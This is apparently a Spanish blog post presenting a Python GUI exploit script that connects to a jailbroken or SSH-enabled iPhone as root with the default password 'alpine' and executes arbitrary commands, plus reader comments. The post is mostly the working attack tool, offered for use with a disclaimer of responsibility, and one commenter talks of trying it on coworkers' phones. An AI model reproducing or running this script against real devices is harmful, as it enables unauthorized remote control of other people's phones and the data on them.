Al parecer en los dispositivos iOS se puede hacer ejecución de código remoto mediante ssh, D35m0nd142 hace un exploit demostrando esta acción.
#!/usr/bin/python # When you've launched the command look the terminal # This software work without Metasploit # Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit # Exploit Author: D35m0nd142 # Vendor Homepage: # Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium import paramiko import Tkinter from tkMessageBox import * import sys import os print "******************************************************************" print "*Apple iPhone iOS Default SSH Remote Command Execution exploit *" print "* Created by D35m0nd142 *" print "******************************************************************\n" root=Tkinter.Tk() root.geometry("%dx%d" % (490,220)) def exploit(): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ip_iphone=ip.get() ssh.connect(ip_iphone,username='root',password='alpine') cmd=command.get() stdin, stdout, stderr = ssh.exec_command(cmd) print stdout.readlines() ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack() ssh.close() root['bg']="black" root.title("Apple iOS Default SSH Remote Command Execution exploit") message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software") developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom') ip_label=Tkinter.Label(text="iPhone IP: ").pack() ip=Tkinter.StringVar() ip_entry=Tkinter.Entry(textvariable=ip).pack() command_label=Tkinter.Label(text="Command to execute: ").pack() command=Tkinter.StringVar() command_entry=Tkinter.Entry(textvariable=command).pack() launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack() root.mainloop()
3 comentarios:
Eso solo funciona con Idevices con jailbreak? de no ser asi me puedo poner a jugar con mis compañeros de trabajo jajaja
no kreo ke se necesite el jailbrake so lo si tienes abilitado el puerto... saludos
no kreo ke se necesite el jailbrake so lo si tienes abilitado el puerto... saludos
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